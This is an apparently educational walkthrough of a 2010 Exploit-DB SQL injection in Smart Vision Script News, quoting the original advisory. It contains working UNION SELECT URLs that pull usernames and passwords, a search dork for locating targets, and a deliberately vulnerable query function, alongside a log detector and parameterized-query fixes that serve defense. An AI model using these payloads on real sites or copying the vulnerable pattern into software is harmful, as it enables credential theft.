Smart Vision Script News 'newsdetail.php' SQL Injection Explained

What this paper is
This paper describes a SQL injection vulnerability found in the newsdetail.php script of the Smart Vision Script News software. The vulnerability allows an attacker to manipulate database queries by injecting malicious SQL code through the id parameter. This can lead to unauthorized access to sensitive data, such as usernames and passwords.
Simple technical breakdown
The core of the vulnerability lies in how the newsdetail.php script handles user input from the id parameter. When a user requests a news detail, the script likely uses the provided id to fetch specific information from a database. If the script doesn't properly sanitize or validate this id before using it in a SQL query, an attacker can insert SQL commands.
The exploit uses a technique called UNION SELECT. This allows an attacker to combine the results of their injected query with the results of the original, legitimate query. By carefully crafting the injected query, the attacker can extract specific columns from different tables, such as user_name and password from the user_accounts table.
The exploit also uses comments (--) to truncate the original SQL query, ensuring that only the injected part is executed.
Complete code and payload walkthrough
The provided paper does not contain executable code in the traditional sense (like a C program or Python script). Instead, it provides a URL pattern that demonstrates the exploit. The "code" here refers to the crafted URL strings that exploit the vulnerability.
Let's break down the exploit URL pattern:
Base URL Structure:

Site /path/newsdetail.php?id=<value>

- Site /path/newsdetail.php: This is the target script on the web server.
- ?id=: This indicates the start of the query string, and id is the parameter being targeted.

Exploit Payload 1: Initial Probing

Site /path/newsdetail.php?id=-12+union+select+1,2,3,4,5,6,7--

- id=-12: This is a negative number. The purpose is likely to ensure that the original query (which expects a valid positive ID) returns no results. This makes it easier to see the results of the injected UNION SELECT statement without interference.
- +union+select+1,2,3,4,5,6,7: This is the injected SQL command.
- union: This SQL operator combines the result sets of two or more SELECT statements.
- select 1,2,3,4,5,6,7: This part selects literal integer values. The attacker is trying to determine the number of columns the original query is expecting. By seeing which numbers are displayed in the output, they can deduce the correct number of columns to use in subsequent, more targeted injections. The number 7 is used here, suggesting the original query likely returns 7 columns.
- --: This is a SQL comment. It tells the database to ignore any characters that follow it in the original SQL query. This is crucial for preventing syntax errors and ensuring only the injected part is executed.

Exploit Payload 2: Extracting Usernames

http://server/newsdetail.php?id=-12+union+select+1,user_name,3,4,5,6,7+from+zagrosle_zagros.user_accounts--

- id=-12: Same purpose as above, to ensure no original results are returned.
- +union+select+1,user_name,3,4,5,6,7: union select combines results; 1,user_name,3,4,5,6,7 is the key part. The attacker has identified that the original query returns 7 columns and is now replacing some of the placeholder numbers with user_name. The goal is to have the user_name column from the specified table appear in the output. The numbers 1, 3, 4, 5, 6 and 7 are placeholders for the other columns that are not being extracted, or that the attacker doesn't need to see at this moment.
- +from+zagrosle_zagros.user_accounts: This specifies the table (user_accounts) and the database (zagrosle_zagros) from which to retrieve the user_name.
- --: SQL comment to ignore the rest of the original query.

Exploit Payload 3: Extracting Passwords

http://server/newsdetail.php?id=-12+union+select+1,password,3,4,5,6,7+from+zagrosle_zagros.user_accounts--

- This payload is identical in structure to the username extraction, with the critical difference being the selection of the password column instead of user_name.
- 1,password,3,4,5,6,7: Replaces user_name with password to extract password hashes or plain-text passwords.
- +from+zagrosle_zagros.user_accounts: Same table and database as before.
- --: SQL comment.

Mapping list:

- newsdetail.php?id=: Target script and vulnerable parameter.
- -12: Value to likely nullify original query results.
- +union+select: SQL keywords to combine query results.
- 1,2,3,4,5,6,7: Placeholder values to determine the number of columns in the original query.
- user_name: Target column for extracting usernames.
- password: Target column for extracting passwords.
- from zagrosle_zagros.user_accounts: Target table and database.
- --: SQL comment to terminate the original query.
Practical details for offensive operations teams
- Required Access Level: Typically requires unauthenticated access to the web application. The vulnerability is exposed via a GET request.
- Lab Preconditions:
  - A vulnerable instance of Smart Vision Script News. This would likely involve setting up a web server (e.g., Apache, Nginx) with PHP and a compatible database (e.g., MySQL).
  - Knowledge of the web application's directory structure to locate newsdetail.php.
  - Understanding of the database schema, specifically table and column names like user_accounts, user_name, and password. This might require prior reconnaissance or educated guessing based on common web application patterns.
- Tooling Assumptions:
  - Web browser for manual testing and verification.
  - A web proxy like Burp Suite or OWASP ZAP to intercept and modify requests, making it easier to craft and send the exploit URLs.
  - Automated SQL injection tools (e.g., sqlmap) could potentially be configured to exploit this, though manual crafting is demonstrated here.
- Execution Pitfalls:
  - Incorrect Column Count: If the original query returns a different number of columns than assumed (e.g., not 7), the UNION SELECT will fail with a database error (MySQL reports that the SELECT statements have a different number of columns). The attacker must first determine the correct column count using the probing payload.
  - Database/Table/Column Name Variations: The attacker assumes specific names (zagrosle_zagros.user_accounts, user_name, password). If these differ, the exploit will fail. Reconnaissance or brute-forcing of common names is necessary.
  - Web Application Firewall (WAF) / Intrusion Detection/Prevention Systems (IDS/IPS): Modern security measures might detect the suspicious UNION SELECT pattern or the presence of SQL keywords in the URL parameters.
  - URL Encoding: Spaces and special characters in URLs need to be URL-encoded (e.g., a space becomes %20 or +). The exploit uses + for spaces, which is common in GET requests.
  - Database Permissions: The web application's database user might not have sufficient privileges to select from the user_accounts table or to retrieve sensitive columns.
- Expected Telemetry:
  - Web Server Logs: Requests to newsdetail.php with unusual id parameters containing UNION SELECT and other SQL keywords. High volume of requests if automated.
  - Database Logs: Queries executed against the user_accounts table, potentially showing SELECT user_name FROM ... or SELECT password FROM ... originating from the web application's connection.
  - Application Error Logs: If the injection fails due to incorrect column counts or syntax errors, the web application might log these errors.
  - IDS/IPS Alerts: Signatures for SQL injection attempts.
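The web-server telemetry described above can be checked mechanically. The following is an added example (not part of the original paper or of the Smart Vision Script News project) that parses Apache combined-format access-log lines, URL-decodes the id parameter of requests to newsdetail.php, and flags any value that is not a plain positive integer, whether the spaces were encoded as + or as %20. The log lines, IP addresses and timestamps are constructed samples, and the keyword list is an illustrative starting point rather than a complete SQL injection signature.

```python
import re
from collections import Counter
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines in Apache combined format (not real traffic).
# Lines 2 and 3 carry the probing and username-extraction patterns from the paper,
# once with '+' for spaces and once with '%20'.
SAMPLE_LOG = """\
203.0.113.5 - - [03/Jan/2010:10:15:01 +0000] "GET /news/newsdetail.php?id=12 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [03/Jan/2010:10:15:09 +0000] "GET /news/newsdetail.php?id=-12+union+select+1,2,3,4,5,6,7-- HTTP/1.1" 200 4711 "-" "Mozilla/5.0"
203.0.113.5 - - [03/Jan/2010:10:15:20 +0000] "GET /news/newsdetail.php?id=-12%20union%20select%201,user_name,3,4,5,6,7%20from%20zagrosle_zagros.user_accounts-- HTTP/1.1" 200 4802 "-" "Mozilla/5.0"
198.51.100.7 - - [03/Jan/2010:10:16:00 +0000] "GET /news/index.php HTTP/1.1" 200 8000 "-" "Mozilla/5.0"
"""

# Apache combined format: client, ident, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Illustrative token list (assumption: a starting point, not a full signature).
SQL_TOKENS = re.compile(r"\b(union|select|from|where|or|and)\b|--|/\*|'", re.IGNORECASE)

REASON_NON_NUMERIC = "id is not a plain positive integer"
REASON_SQL_TOKENS = "id contains SQL keywords or comment markers"


def classify_id(target):
    """Return (decoded id value, reason) for a request target, or (None, None)
    when the request is not for newsdetail.php or carries no id parameter.
    reason is None when the id is exactly what the script expects: digits only."""
    parts = urlsplit(target)
    if parts.path.rsplit("/", 1)[-1] != "newsdetail.php":
        return None, None
    params = parse_qs(parts.query, keep_blank_values=True)
    if "id" not in params:
        return None, None
    # parse_qs already turns '+' and '%20' into spaces, so encoding variants collapse.
    value = params["id"][0]
    if re.fullmatch(r"[0-9]+", value):
        return value, None
    if SQL_TOKENS.search(value):
        return value, REASON_SQL_TOKENS
    return value, REASON_NON_NUMERIC


def scan_log(text):
    """Return one alert dict per suspicious newsdetail.php request in the log text."""
    alerts = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        value, reason = classify_id(m.group("target"))
        if reason is None:
            continue
        alerts.append({"ip": m.group("ip"), "ts": m.group("ts"),
                       "status": int(m.group("status")), "id": value, "reason": reason})
    return alerts


def alerts_per_ip(alerts):
    """Count alerts by client address; many hits from one source suggest automation."""
    return dict(Counter(a["ip"] for a in alerts))


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for a in found:
        print(f'{a["ts"]} {a["ip"]} status={a["status"]} {a["reason"]}: id={a["id"]!r}')
    print("alerts per ip:", alerts_per_ip(found))
```

Decoding before matching is the important design choice: a rule that greps the raw request line for the literal string "union select" misses the %20 variant, while a rule applied to the decoded parameter treats both encodings identically. The status code is kept in each alert because a 200 on an injected request, as in the sample, is the case worth escalating: it means the query ran rather than failing.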
Where this was used and when
The exploit was published on January 3, 2010. This indicates that such vulnerabilities were actively being discovered and exploited around that time. The "dork" provided (Come from home Script ( Latest Project ) www.esmart-vision.com) suggests that the attacker likely used search engines (like Google) with specific search queries to find websites running this particular software. This type of vulnerability is common in older, unpatched web applications.
Defensive lessons for modern teams
- Input Validation and Sanitization: This is the most critical defense. All user-supplied input, especially data used in database queries, must be strictly validated and sanitized.
- Parameterized Queries/Prepared Statements: Use these exclusively for database interactions. They separate SQL code from data, preventing injected code from being executed.
- Whitelisting: Only allow expected characters or formats for input parameters.
- Escaping Special Characters: Properly escape characters that have special meaning in SQL.
- Principle of Least Privilege: The database user account used by the web application should only have the minimum necessary permissions to perform its tasks. It should not have broad SELECT * privileges or access to sensitive system tables unless absolutely required.
- Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common attack patterns like SQL injection. Keep WAF rules updated.
- Regular Patching and Updates: Keep all web applications, frameworks, and underlying server software updated to patch known vulnerabilities.
- Security Audits and Code Reviews: Regularly audit web application code for security flaws, especially around data input and database interaction.
- Error Handling: Configure applications to log detailed errors internally but display generic error messages to users. Avoid revealing database schema or query details to the public.
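The parameterized-query and whitelisting lessons above, shown side by side with the flaw they fix. This is an added example in Python with SQLite, not code from the original paper or from Smart Vision Script News (a PHP application whose real schema the paper does not give). The news table, its column names other than user_name and password, and the sample rows are constructed; the payload is the decoded form of the paper's username URL with the zagrosle_zagros database qualifier dropped, because SQLite has no equivalent.

```python
import re
import sqlite3

# Column list is fixed in code, so it is safe to splice into the SQL text.
NEWS_COLUMNS = "id, title, body, author, posted, category, hits"

# Decoded form of the paper's username-extraction payload (database qualifier dropped).
INJECTED_ID = "-12 union select 1,user_name,3,4,5,6,7 from user_accounts--"


def build_db():
    """In-memory SQLite database with constructed sample rows (assumption: the real
    schema is unknown; only user_accounts, user_name and password come from the paper)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (
            id INTEGER PRIMARY KEY, title TEXT, body TEXT, author TEXT,
            posted TEXT, category TEXT, hits INTEGER);
        CREATE TABLE user_accounts (user_name TEXT, password TEXT);
        INSERT INTO news VALUES (12, 'Hello', 'First post', 'editor', '2010-01-03', 'general', 3);
        INSERT INTO user_accounts VALUES ('admin', 'constructed-hash-0001');
    """)
    return conn


def fetch_news_vulnerable(conn, raw_id):
    """The flaw the paper describes: the request parameter is pasted into the SQL
    text, so a value beginning with a UNION clause is executed as part of the query."""
    sql = f"SELECT {NEWS_COLUMNS} FROM news WHERE id = {raw_id}"
    return conn.execute(sql).fetchall()


def fetch_news_parameterized(conn, raw_id):
    """Prepared statement only: the value is bound as data and never reaches the
    SQL parser. A non-numeric value simply matches no row."""
    sql = f"SELECT {NEWS_COLUMNS} FROM news WHERE id = ?"
    return conn.execute(sql, (raw_id,)).fetchall()


def fetch_news_hardened(conn, raw_id):
    """Whitelist validation plus a bound parameter: reject anything that is not a
    positive integer before it reaches the database, so the rejection can be logged."""
    if not isinstance(raw_id, str) or not re.fullmatch(r"[0-9]{1,10}", raw_id):
        raise ValueError("id must be a positive integer")
    sql = f"SELECT {NEWS_COLUMNS} FROM news WHERE id = ?"
    return conn.execute(sql, (int(raw_id),)).fetchall()


def demo():
    """Run the same inputs through all three variants and collect the outcomes."""
    conn = build_db()
    results = {
        "vulnerable_normal": fetch_news_vulnerable(conn, "12"),
        "vulnerable_injected": fetch_news_vulnerable(conn, INJECTED_ID),
        "parameterized_injected": fetch_news_parameterized(conn, INJECTED_ID),
        "hardened_normal": fetch_news_hardened(conn, "12"),
    }
    try:
        fetch_news_hardened(conn, INJECTED_ID)
        results["hardened_injected"] = "accepted"
    except ValueError as exc:
        results["hardened_injected"] = f"rejected: {exc}"
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name}: {outcome}")
```

Binding the value alone is enough to stop the injection, because the driver never lets the string reach the SQL parser; the vulnerable variant returns the user_accounts row in the title column, the parameterized one returns nothing. The integer whitelist on top turns that silent empty result into an explicit rejection, which is what an application error log should record.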
ASCII visual (if applicable)
This exploit is a direct manipulation of HTTP requests and SQL queries. A visual representation of the network flow is straightforward:
+-----------------+      +-----------------+      +-----------------+      +-----------------+
| Attacker's      |----->| Web Browser /   |----->| Web Server      |----->| Database Server |
| Machine         |      | Proxy           |      | (newsdetail.php)|      | (SQL Query)     |
+-----------------+      +-----------------+      +-----------------+      +-----------------+
        ^                                                 |
        | (Malicious URL)                                 | (Vulnerable Query)
        |                                                 v
        +-------------------------------------------------+
                  (Exploit Payload: UNION SELECT)

Explanation:
The attacker crafts a malicious URL. This URL is sent to the web server. The newsdetail.php script on the web server processes the request and, due to the vulnerability, constructs a malicious SQL query that is sent to the database. The database executes the combined query, and the attacker receives sensitive data in the web response.
Source references
- Exploit Title: Smart Vision Script News - 'newsdetail.php' SQL Injection (1)
- Author: Err0R
- Published: 2010-01-03
- Paper URL: https://www.exploit-db.com/papers/10977
Original Exploit-DB Content (Verbatim)
# Exploit Title: Smart Vsion Script News (newsdetail) SQL Injection Vulnerability
# Software Link: www.esmart-vision.com
============================================
| Smart Vision Script News ( newsdetail ) SQL Injection Vulnerability
============================================
# (+) Author: Err0R
# (+) Site : www.sa-hacker.com/vb
# (+) Email : a5q@hotmail.com
=====================================
~~~~~~~~~~~~~~~~~~~~
dork : Come from home Script ( Latest Project ) www.esmart-vision.com
~~~~~~~~~~~~~~~~~~~~
Exploit : Site /path/newsdetail.php?id=-12+union+select+1,2,3,4,5,6,7--
And you come the enject ,,
Demo :-
User name : http://server/newsdetail.php?id=-12+union+select+1,user_name,3,4,5,6,7+from+zagrosle_zagros.user_accounts--
Password : http://server/newsdetail.php?id=-12+union+select+1,password,3,4,5,6,7+from+zagrosle_zagros.user_accounts--
admin Login : Site /path/admin/admin.php
=============================================================
#====GreeTZ===================#
#all member in www.sa-hacker.com/vb #
#and all in My email : ) #
#============================#